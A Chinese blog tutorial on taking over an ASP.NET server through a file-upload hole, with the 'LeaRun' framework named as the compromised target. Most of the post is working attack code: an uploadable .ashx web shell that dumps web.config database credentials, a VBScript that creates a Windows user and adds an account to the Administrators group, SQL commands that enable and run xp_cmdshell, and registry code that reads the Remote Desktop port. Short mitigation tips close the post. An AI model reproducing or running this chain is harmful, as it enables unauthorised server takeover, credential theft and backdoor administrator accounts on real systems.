你的位置:首页 > ASP.net教程

[ASP.net教程]ASP.NET网站入侵第二波(LeaRun.信息化快速开发框架 已被笔者拿下)

笔者小学文化,语言组织能力差,写的不通的地方请大家将就着看,不喜勿喷。

    上篇我讲了如何在上传文件中入侵服务器,這次我们稍微多讲一点。

   还是先讲下流程:

1、上传代码页面  我上传的是ashx页面。

2、用ashx页面已文本形式显示web.Config的内容 得到数据库连接,

3、用ashx在网站根目录输出vbs脚本(创建Windows账户脚本)

4、开启数据库的xp_cmdshell。

5、利用数据库执行在网站根目录输出vbs脚本。入侵就完成了

ashx代码文件如下

/// <summary>    /// 显示配置文件    /// </summary>    /// <param name="context"></param>    public void ShowWebConfig(HttpContext context)    {      context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));    }    /// <summary>    /// 写vbs脚本    /// </summary>    /// <param name="context"></param>    public void WriteVbs(HttpContext context)    {      System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")\r\nos=\"WinNT://\"&wsnetwork.ComputerName\r\nSet ob=GetObject(os) '得到adsi接口,绑定\r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nSet od=ob.Create(\"user\",\"test\") '建立用户\r\nod.SetPassword \"1234\" '设置密码\r\nod.SetInfo '保存\r\nSet of=GetObject(os&\"/test\",user) '得到用户\r\noe.add os&\"/freeast\" \r\n");    }    /// <summary>    /// 直线数据库    /// </summary>    /// <param name="connection"></param>    /// <param name="sql"></param>    public void ExecuteSql(string connection, string sql)    {      using (SqlConnection con = new SqlConnection(connection))      {        using (SqlCommand commd = new SqlCommand(sql, con))        {          con.Open();          commd.ExecuteNonQuery();          con.Close();        }      }    }    /// <summary>    /// 直线数据库并输出表格    /// </summary>    /// <param name="context"></param>    /// <param name="connection"></param>    /// <param name="sql"></param>    public void ExecuteSql1(HttpContext context,string connection, string sql)    {      System.Data.DataTable table = new System.Data.DataTable();      using (SqlConnection con = new SqlConnection(connection))      {        using (SqlCommand commd = new SqlCommand(sql, con))        {          con.Open();          using (SqlDataAdapter ad = new SqlDataAdapter(commd))          {            ad.Fill(table);          }          con.Close();        }      }      foreach (System.Data.DataRow row in table.Rows)      {        foreach (System.Data.DataColumn column in table.Columns)        {          context.Response.Write(row[column]);          context.Response.Write("\t");        }        context.Response.Write("\r\n");      }    }    /// <summary>    /// 显示远程桌面端口    /// </summary>    /// <param name="context"></param>    private void ShowPort(HttpContext context)    {      context.Response.Write(Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp").GetValue("PortNumber").ToString());    }    public void ProcessRequest(HttpContext context)    {      context.Response.ContentType = "text/plain";            try      {        var connection = context.Request.QueryString["connection"];        switch (context.Request.QueryString["method"])        {          case "1": WriteVbs(context); break;          case "2":            ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");            ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell            break;          case "3": ExecuteSql1(context, connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");            break;          case "4": ShowPort(context); break;          default:            ShowWebConfig(context);            break;        }      }      catch (Exception ex)      {        context.Response.Write(ex.Message);      }      context.Response.End();    }    public bool IsReusable    {      get      {        return false;      }    }

View Code

 

這里我们以 "LeaRun.信息化快速开发框架"的在线按钮为例

上传文件我就不说了,上篇有人在问我怎么显示web.Config的内容,我这里具体贴下代码 其实很简单,File.ReadAllText  web.config文件就可以了

public void ShowWebConfig(HttpContext context)    {      context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));    }

运行后直线ashx 得到数据库连接,如图

 

其次就是创建Windows账户的脚本

set wsnetwork=CreateObject("WSCRIPT.NETWORK")os="WinNT://"&wsnetwork.ComputerNameSet ob=GetObject(os) '得到adsi接口,绑定Set oe=GetObject(os&"/Administrators,group") '属性,admin组Set od=ob.Create("user","test") '建立用户od.SetPassword "1234" '设置密码od.SetInfo '保存Set of=GetObject(os&"/test",user) '得到用户oe.add os&"/freeast" 

View Code

 

然后开启数据库的xp_cmdshell。

sp_configure 'show advanced options',1 reconfigureGosp_configure 'xp_cmdshell',1 reconfigure


在最后执行vbs脚本

exec master..xp_cmdshell 'cscript 脚本文件目录"'

运行结果如下:


好 这说明直线成功了。。。。 也就是服务器用户添加成功了

 

现在要开始远程桌面了,于是个端口扫描工具发现3389是关的,于是断定肯定是修改了端口后,于是就加了个代码,让程序去读取远程桌面端口,

代码如下:

/// <summary>    /// 显示远程桌面端口    /// </summary>    /// <param name="context"></param>    private void ShowPort(HttpContext context)    {      context.Response.Write(Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp").GetValue("PortNumber").ToString());    }


好了 到這里 一切的完成了 ,打开远程桌面连接吧。。

 

因为此次公开还没来得及通知  事主 于是自己帮事主把这个漏洞补上了后才发出来的,所以你们也不要去试了   -.-!!!!然后我在来说说补救的方法,我就简单介绍几种了

1、将上传的文件放到网站外,也就是说 让iit读取不到(但记得分配权限) ,如:假如我网站放在 d:\\Web\Oa\  这个是我网站的跟目录,那么我上传的文件 可以放到 d:\File\OA 里面,别人就不能直接访问

2、就是在上传文件的目录下新建立个web.config 把所有请求都拒绝,(C#是可以读取的,只是需要用Response.WriteFile 输出)

3、全部压缩

。。。。。。。。。。。。。。。。

 

好了 ,大家抓紧把之前的项目整理一遍吧,把能补的补上。。。。 千万别用這些漏洞去做坏事哦  ,。。。 那样你会被请去喝茶的。。。。-.-!!!!!